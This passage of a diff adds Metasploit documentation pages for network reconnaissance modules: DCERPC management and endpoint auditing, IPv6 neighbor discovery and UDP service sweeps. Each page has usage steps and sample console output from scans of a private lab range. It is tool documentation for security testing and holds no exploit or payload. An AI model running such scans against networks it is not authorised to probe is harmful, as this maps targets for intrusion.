+[*] 	HIDDEN: UUID c681d488-d850-11d0-8c52-00c04fd90f7e v1.0
+[*] 		CONN BIND CALL ERROR=DCERPC FAULT => nca_s_fault_ndr 
+[*] 
+[*] 	HIDDEN: UUID 11220835-5b26-4d94-ae86-c3e475a809de v1.0
+[*] 		CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied 
+[*] 
+[*] 	HIDDEN: UUID 5cbe92cb-f4be-45c9-9fc9-33e73e557b20 v1.0
+[*] 		CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied 
+[*] 
+[*] 	HIDDEN: UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0
+[*] 		CONN BIND CALL DATA=0000000057000000 
+[*] 
+[*] 	HIDDEN: UUID 1cbcad78-df0b-4934-b558-87839ea501c9 v0.0
+[*] 		CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied 
+[*] 
+[*] 	HIDDEN: UUID c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
+[*] 		CONN BIND ERROR=DCERPC FAULT => nca_s_fault_access_denied 
+[*] 
+[*] Remote Management Interface Error: The connection timed out (192.168.1.202:49152).
+...snip...
+[*] Scanned 55 of 55 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(hidden) >
+```

documentation/modules/auxiliary/scanner/dcerpc/management.md

@@ -0,0 +1,87 @@
+## Description
+
+The dcerpc/management module scans a range of IP addresses and obtains information from the Remote Management interface of the DCERPC service.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/dcerpc/management```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+### Example Windows 2003, and Windows 7 Targets
+
+```
+msf > use auxiliary/scanner/dcerpc/management
+msf auxiliary(management) > set RHOSTS 192.168.1.200-254
+RHOSTS => 192.168.1.200-254
+msf auxiliary(management) > set THREADS 55
+THREADS => 55
+msf auxiliary(management) > run
+
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
+[*] UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_access_denied
+[*] Remote Management Interface Error: The connection was refused by the remote host (192.168.1.250:135).
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.1
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 1d55b526-c137-46c5-ab79-638f2a68e869 v1.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID e60c73e6-88f9-11cf-9af1-0020af6e72f4 v2.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 99fcfec4-5260-101b-bbcb-00aa0021347a v0.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID b9e79e60-3d52-11ce-aaa1-00006901293f v0.2
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 412f241e-c12a-11ce-abff-0020af6e7a17 v0.2
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 00000136-0000-0000-c000-000000000046 v0.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID c6f3ee72-ce7e-11d1-b71e-00c04fc3111a v1.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 v0.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+[*] UUID 000001a0-0000-0000-c000-000000000046 v0.0
+[*] Remote Management Interface Error: DCERPC FAULT => nca_s_fault_ndr
+[*] 	 listening: 00000000
+[*] 	 killed: 00000005
+[*] 	 name: 00010000000000000100000000000000d3060000
+...snip...
+[*] Scanned 55 of 55 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(management) >
+```

documentation/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.md

@@ -0,0 +1,43 @@
+## Description
+
+The dcerpc/tcp_dcerpc_auditor module scans a range of IP addresses to determine what DCERPC services are available over a TCP port.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+### Example Windows 2003, and Windows 7 Targets
+
+```
+msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
+msf auxiliary(tcp_dcerpc_auditor) > set RHOSTS 192.168.1.200-254
+RHOSTS => 192.168.1.200-254
+msf auxiliary(tcp_dcerpc_auditor) > set THREADS 55
+THREADS => 55
+msf auxiliary(tcp_dcerpc_auditor) > run
+
+The connection was refused by the remote host (192.168.1.250:135).
+The host (192.168.1.210:135) was unreachable.
+...snip...
+The host (192.168.1.200:135) was unreachable.
+[*] Scanned 38 of 55 hosts (069% complete)
+...snip...
+The host (192.168.1.246:135) was unreachable.
+192.168.1.203 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
+192.168.1.201 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
+192.168.1.204 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000076070000
+192.168.1.202 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 ACCESS GRANTED 00000000000000000000000000000000000000000000000005000000
+192.168.1.204 - UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA 135 ACCESS GRANTED 000002000b0000000b00000004000200080002000c0002001000020014000200180002001c0002002000020024000200280002002c0002000883afe11f5dc91191a408002b14a0fa0300000084650a0b0f9ecf11a3cf00805f68cb1b0100010026b5551d37c1c546ab79638f2a68e86901000000e6730ce6f988cf119af10020af6e72f402000000c4fefc9960521b10bbcb00aa0021347a00000000609ee7b9523dce11aaa100006901293f000002001e242f412ac1ce11abff0020af6e7a17000002003601000000000000c0000000000000460000000072eef3c67eced111b71e00c04fc3111a01000000b84a9f4d1c7dcf11861e0020af6e7c5700000000a001000000000000c0000000000000460000000000000000
+192.168.1.204 - UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa 3.0 OPEN VIA 135 ACCESS GRANTED d8060000
+[*] Scanned 52 of 55 hosts (094% complete)
+[*] Scanned 54 of 55 hosts (098% complete)
+The connection timed out (192.168.1.205:135).
+[*] Scanned 55 of 55 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(tcp_dcerpc_auditor) >
+```

documentation/modules/auxiliary/scanner/discovery/ipv6_neighbor.md

@@ -0,0 +1,50 @@
+## Description
+
+This auxiliary module probes the local network for IPv6 hosts that respond to Neighbor Solicitations with a link-local address. This module, like the arp_sweep one, will generally only work within the attacking machine’s broadcast domain. It serves the dual-purpose of showing what hosts are online similar to arp_sweep and then performs the IPv6 Neighbor Discovery.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/discovery/ipv6_neighbor```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set SHOST [IP]```
+4. Do: ```set SMAC [MAC]```
+5. Do: ```set THREADS [number of threads]```
+6. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/discovery/ipv6_neighbor
+msf auxiliary(ipv6_neighbor) > set RHOSTS 192.168.1.2-254
+RHOSTS => 192.168.1.200-254
+msf auxiliary(ipv6_neighbor) > set SHOST 192.168.1.101
+SHOST => 192.168.1.101
+msf auxiliary(ipv6_neighbor) > set SMAC d6:46:a7:38:15:65
+SMAC => d6:46:a7:38:15:65
+msf auxiliary(ipv6_neighbor) > set THREADS 55
+THREADS => 55
+msf auxiliary(ipv6_neighbor) > run
+
+[*] IPv4 Hosts Discovery
+[*] 192.168.1.10 is alive.
+[*] 192.168.1.11 is alive.
+[*] 192.168.1.2 is alive.
+[*] 192.168.1.69 is alive.
+[*] 192.168.1.109 is alive.
+[*] 192.168.1.150 is alive.
+[*] 192.168.1.61 is alive.
+[*] 192.168.1.201 is alive.
+[*] 192.168.1.203 is alive.
+[*] 192.168.1.205 is alive.
+[*] 192.168.1.206 is alive.
+[*] 192.168.1.99 is alive.
+[*] 192.168.1.97 is alive.
+[*] 192.168.1.250 is alive.
+[*] IPv6 Neighbor Discovery
+[*] 192.168.1.69 maps to IPv6 link local address fe80::5a55:caff:fe14:1e61
+[*] 192.168.1.99 maps to IPv6 link local address fe80::5ab0:35ff:fe6a:4ecc
+[*] 192.168.1.97 maps to IPv6 link local address fe80::7ec5:37ff:fef9:a96a
+[*] Scanned 253 of 253 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(ipv6_neighbor) >
+```

documentation/modules/auxiliary/scanner/discovery/udp_sweep.md

@@ -0,0 +1,42 @@
+## Description
+
+The `udp_sweep` module scans across a given range of hosts to detect commonly available UDP services.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/discovery/udp_sweep```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/discovery/udp_sweep
+msf auxiliary(udp_sweep) > set RHOSTS 192.168.1.2-254
+RHOSTS => 192.168.1.2-254
+msf auxiliary(udp_sweep) > set THREADS 253
+THREADS => 253
+msf auxiliary(udp_sweep) > run
+
+[*] Sending 10 probes to 192.168.1.2->192.168.1.254 (253 hosts)
+[*] Discovered NetBIOS on 192.168.1.109:137 (SAMSUNG::U :SAMSUNG::U :00:15:99:3f:40:bd)
+[*] Discovered NetBIOS on 192.168.1.150:137 (XEN-WIN7-PROD::U :WORKGROUP::G :XEN-WIN7-PROD::U :WORKGROUP::G :aa:e3:27:6e:3b:a5)
+[*] Discovered NetBIOS on 192.168.1.203:137 (XEN-XP-SPLOIT::U :WORKGROUP::G :XEN-XP-SPLOIT::U :WORKGROUP::G :3e:ff:3c:4c:89:67)
+[*] Discovered NetBIOS on 192.168.1.201:137 (XEN-XP-SP2-BARE::U :HOTZONE::G :XEN-XP-SP2-BARE::U :HOTZONE::G :HOTZONE::U :__MSBROWSE__::G :c6:ce:4e:d9:c9:6e)
+[*] Discovered NetBIOS on 192.168.1.206:137 (XEN-XP-PATCHED::U :XEN-XP-PATCHED::U :HOTZONE::G :HOTZONE::G :12:fa:1a:75:b8:a5)
+[*] Discovered NetBIOS on 192.168.1.250:137 (FREENAS::U :FREENAS::U :FREENAS::U :__MSBROWSE__::G :WORKGROUP::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00)
+[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
+[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
+[*] Discovered NTP on 192.168.1.69:123 (NTP v4)
+[*] Discovered NTP on 192.168.1.99:123 (NTP v4)
+[*] Discovered NTP on 192.168.1.201:123 (Microsoft NTP)
+[*] Discovered NTP on 192.168.1.203:123 (Microsoft NTP)
+[*] Discovered NTP on 192.168.1.206:123 (Microsoft NTP)
+[*] Discovered MSSQL on 192.168.1.206:1434 (ServerName=XEN-XP-PATCHED InstanceName=SQLEXPRESS IsClustered=No Version=9.00.4035.00 tcp=1050 np=\\XEN-XP-PATCHED\pipe\MSSQL$SQLEXPRESS\sql\query )
+[*] Discovered SNMP on 192.168.1.2:161 (GSM7224 L2 Managed Gigabit Switch)
+[*] Discovered SNMP on 192.168.1.109:161 (Samsung CLX-3160 Series; OS V1.01.01.16 02-25-2008;Engine 6.01.00;NIC V4.03.08(CLX-3160) 02-25-2008;S/N 8Y61B1GP400065Y.)
+[*] Scanned 253 of 253 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(udp_sweep) >
+```